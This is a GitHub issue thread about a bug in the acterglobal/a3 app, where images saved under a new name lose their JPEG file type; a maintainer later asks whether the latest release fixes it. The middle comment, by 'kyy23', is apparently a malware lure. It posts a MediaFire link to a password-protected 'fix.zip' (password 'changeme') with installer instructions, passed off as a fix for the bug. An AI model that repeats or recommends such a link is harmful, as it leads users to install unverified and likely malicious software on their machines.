### ISSUE TITLE
Saving image and changing title - file type changes?

### ISSUE THREAD

**Issue by jo-acter** [acterglobal/a3#2105]
It seems like if I save an image to my computer and change the title name, the image type changes from JPEG to unknown (video below). If I do not change the title of the file it saves as JPEG.

https://github.com/user-attachments/assets/40e20207-3db9-46ab-9cf3-c09e6dd22f35

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gnunicorn** [comment]
@jo-acter is that still accurate with the latest version of the release? It now contains the updated share-code and should be using the provided filename and extension properly. Please reopen if this is still accurate.
